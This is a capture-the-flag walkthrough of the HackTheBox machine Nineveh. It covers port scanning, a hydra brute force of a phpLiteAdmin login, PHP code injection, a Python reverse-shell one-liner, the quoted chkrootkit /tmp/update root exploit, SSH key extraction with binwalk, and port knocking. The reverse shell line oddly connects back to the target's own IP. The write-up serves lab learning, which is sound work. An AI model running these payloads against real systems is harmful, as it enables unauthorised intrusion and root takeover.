HackTheBox — Nineveh
Reconnaissance
Nmap 7.80 scan initiated Thu Sep 17 14:33:38 2020 as: nmap -sC -sV -A -oN initial 10.10.10.43
Nmap scan report for 10.10.10.43
Host is up (0.19s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
443/tcp open ssl/http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=nineveh.htb/organizationName=HackTheBox Ltd/stateOrProvinceName=Athens/countryName=GR
| Not valid before: 2017-07-01T15:03:30
|_Not valid after: 2018-07-01T15:03:30
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1Scanning reveals 2 ports running . HTTP on 80 and HTTPS on 443 .
Add nineveh.htb to hosts file.
Using GoBuster , we find a directory called /db
Heading over to https://nineveh.htb/db.index.php gives us
phpliteadmin is a web portal to manage sql databases. Running hydra on this form gave us admin:password123
Login into phpliteadmin . There’s a database called test in /var/tmp/test and has no tables. Run searchsploit on phpliteadmin.
PHPLiteAdmin 1.9.3 — Remote PHP Code Injection
Since we have logged into phpliteadmin as admin , we can rename the database to .php extension.
Put some php code in the text fields of a table and execute it in the browser.
We need to save the database as ninevehNotes.php as the server checks for the field “ninevehNotes”.
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.10.43",9001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'Got a shell @www-data
Writing procmon.sh which is a neat process monitoring script . It does not monitor everything running on the system as pspy would but only new processes that are started while the shell script is run .
#!/bin/bashIFS=$'\n'
old_process=$(ps -eo user,command)
while true
do
new_process=$(ps -eo user,command)
diff <(echo "$old_process") <(echo "$new_process") | grep [\<\>]
sleep 1
old_process=$new_process
done
We see a binary called vulnScan.sh that is being run . Hopefully by root :)
chkrootkit
#!/bin/bash
/usr/bin/chkrootkit > /report/report-`date +%y-%m-%d:%H:%M`.txt
chown amrois:amrois /report/report-`date +%y-%m-%d:%H:%M`.txtchkrootkit is a tool for checking rootkits on a system .It has a flaw where we can write a file called update in ./tmp directory .
We just found a serious vulnerability in the chkrootkit package, which
may allow local attackers to gain root access to a box in certain
configurations (/tmp not mounted noexec).
The vulnerability is located in the function slapper() in the
shellscript chkrootkit:
slapper (){
SLAPPER_FILES="${ROOTDIR}tmp/.bugtraq ${ROOTDIR}tmp/.bugtraq.c"
SLAPPER_FILES="$SLAPPER_FILES ${ROOTDIR}tmp/.unlock ${ROOTDIR}tmp/httpd \
${ROOTDIR}tmp/update ${ROOTDIR}tmp/.cinik ${ROOTDIR}tmp/.b"a
SLAPPER_PORT="0.0:2002 |0.0:4156 |0.0:1978 |0.0:1812 |0.0:2015 "
OPT=-an
STATUS=0
file_port=
if ${netstat} "${OPT}"|${egrep} "^tcp"|${egrep} "${SLAPPER_PORT}">
/dev/null 2>&1
then
STATUS=1
[ "$SYSTEM" = "Linux" ] && file_port=`netstat -p ${OPT} | \
$egrep ^tcp|$egrep "${SLAPPER_PORT}" | ${awk} '{ print $7 }' |
tr -d :`
fi
for i in ${SLAPPER_FILES}; do
if [ -f ${i} ]; then
file_port=$file_port $i
STATUS=1
fi
done
if [ ${STATUS} -eq 1 ] ;then
echo "Warning: Possible Slapper Worm installed ($file_port)"
else
if [ "${QUIET}" != "t" ]; then echo "not infected"; fi
return ${NOT_INFECTED}
fi
}The line ‘file_port=$file_port $i’ will execute all files specified in
$SLAPPER_FILES as the user chkrootkit is running on (usually root), if
$file_port is empty, because of missing quotation marks around the
variable assignment.
- Put an executable file named ‘update’ with non-root owner in /tmp (not
mounted noexec, obviously)
- Run chkrootkit (as uid 0)
Result: The file /tmp/update will be executed as root, thus effectively
rooting your box, if malicious content is placed inside the file.
Write a reverse shell to /tmp/update and wait for reverse shell as root.
chkrootkit is mostly always run as root.
We get a reverse shell as root . Voila! We can grab both the root and user flags. Direct PrivEsc to root!
However , the intended way of doing this is through the user amrois .
Our nmap scan didnt give us ssh was running but ps -ef | grep sshd gave results on the system. The port was being filtered , IPtables rules .
Here’s the knockd configuration file(read access only on root):
Port knocking .
Heading over to https://nineveh.htb/secure_notes
We get an image nineveh.png
Running binwalk on this image
Atfer extracting the folder we get the public and private ssh keys for the user amrois.
ssh is however filtered . It has a port knocking service running. We need to send tcp syn packets on the specified ports to open the ssh port.
Check out the /var/mail directory , we get knock codes 571, 290, 911.
Use nmap to send syn packets to these ports .
for i in 571 290 911; do nmap -Pn -p $i --host_timeout 201 --max-retries 0 nineveh.htb; done After successfully port knocking , we have ssh open. Use keys from amrois to ssh into the box and get the user flag.
Use the previous chkrootkit exploit to get root access. ;)
